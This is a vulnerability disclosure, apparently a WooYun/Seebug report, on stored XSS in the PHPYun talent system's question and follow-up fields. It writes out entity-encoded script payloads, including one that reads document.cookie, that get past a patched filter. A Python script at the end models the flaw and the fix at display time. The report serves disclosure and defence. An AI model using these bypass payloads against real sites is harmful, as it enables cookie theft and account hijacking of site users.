### Brief description:
Two stored XSS in the PHPYun talent system (php云人才系统)
### Details:
WooYun-2014-73319 ( [WooYun: multiple stored XSS in the PHPYun talent system (php云人才系统)](http://www.wooyun.org/bugs/wooyun-2014-073319) ) previously reported these two stored XSS issues. The vendor fixed them, but they can still be triggered in an unusual way: by submitting the payload HTML-entity-encoded, so that it passes the filter and is decoded again when displayed.
0x01: "Ask a question" (我要提问)
================================================================
First HTML-entity-encode the code to be injected, for example:
```
<script>alert(1);</script>
```
After encoding it becomes:
```
&lt;script&gt;alert(1);&lt;/script&gt;
```
Then paste it into the content field:
![1.png](https://images.seebug.org/upload/201412/24133738752d5973ac5b810cf0270d52586655dc.png)
Submit:
![2.png](https://images.seebug.org/upload/201412/24133819af5c902eee5ba5b3a3228d12c28d8435.png)
Once the question is saved, the alert box pops up:
![3.png](https://images.seebug.org/upload/201412/24133846bd128e41b2cdede2eae1ee2c0d651d1c.png)
0x02: "Follow-up question" (追加问题)
================================================================
In the same way, first HTML-entity-encode the code to be injected, for example:
```
<script>alert(document.cookie);</script>
```
After encoding, the content is:
```
&lt;script&gt;alert(document.cookie);&lt;/script&gt;
```
Then paste it into the content field:
![4.png](https://images.seebug.org/upload/201412/241341151484e629315ab38e69bb6af68ebd6657.png)
After the reply is submitted, the alert box pops up:
![5.png](https://images.seebug.org/upload/201412/24134212c05a57ecbe169ac1c8a0b998f6a64da7.png)
### Proof of vulnerability:
![1.png](https://images.seebug.org/upload/201412/24133738752d5973ac5b810cf0270d52586655dc.png)
![3.png](https://images.seebug.org/upload/201412/24133846bd128e41b2cdede2eae1ee2c0d651d1c.png)
![4.png](https://images.seebug.org/upload/201412/241341151484e629315ab38e69bb6af68ebd6657.png)
![5.png](https://images.seebug.org/upload/201412/24134212c05a57ecbe169ac1c8a0b998f6a64da7.png)
The INSERT SQL statement seen on the backend is:
```
INSERT INTO `phpyun_question` SET `title`='aaaa',`cid`='54',`content`='<script></script>',`uid`='1',`add_time`='1419394975'
```
Presumably the display code decodes the stored entities one more time, which is what turns the filtered, entity-encoded text back into live markup.
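The failure mode above, input-side tag stripping followed by an entity decode at display time, can be modelled in a few lines. This is an added illustration, not PHPYun's code: `vendor_filter` is an assumed stand-in for the vendor's patched filter, and the two render functions contrast the decode-on-display behaviour the report infers with escaping at output.

```python
import html
import re

# Assumed stand-in for the vendor's input filter: strips raw <script> tags only.
SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)


def vendor_filter(user_input: str) -> str:
    """Input-side filter that only sees literal '<script>' tags."""
    return SCRIPT_TAG.sub("", user_input)


def store(user_input: str) -> str:
    """What ends up in the `content` column: filtered, otherwise verbatim."""
    return vendor_filter(user_input)


def render_vulnerable(stored: str) -> str:
    """Display path the report infers: one layer of entities is decoded,
    so '&lt;script&gt;' stored as text becomes a live tag in the page."""
    return html.unescape(stored)


def render_safe(stored: str) -> str:
    """Hardened display path: never decode at output, always escape.
    Whatever the user typed is shown as literal text."""
    return html.escape(stored, quote=True)


def contains_live_script(rendered: str) -> bool:
    """Detection helper: does the rendered HTML carry a real <script> tag?"""
    return SCRIPT_TAG.search(rendered) is not None


def analyze(payload: str) -> dict:
    """Run one submitted string through both pipelines and report the outcome."""
    stored = store(payload)
    vuln_html = render_vulnerable(stored)
    safe_html = render_safe(stored)
    return {
        "stored": stored,
        "vulnerable_render": vuln_html,
        "safe_render": safe_html,
        "xss_in_vulnerable": contains_live_script(vuln_html),
        "xss_in_safe": contains_live_script(safe_html),
    }


if __name__ == "__main__":
    # Constructed inputs: the raw payload and its entity-encoded form from the report.
    raw = "<script>alert(1);</script>"
    encoded = html.escape(raw, quote=False)  # '&lt;script&gt;alert(1);&lt;/script&gt;'
    for name, p in (("raw", raw), ("encoded", encoded)):
        print(name, analyze(p))
```

The raw payload is neutralised by the filter, while the encoded one passes untouched and only becomes executable because the display path decodes it; escaping at output closes the gap regardless of how the input was encoded.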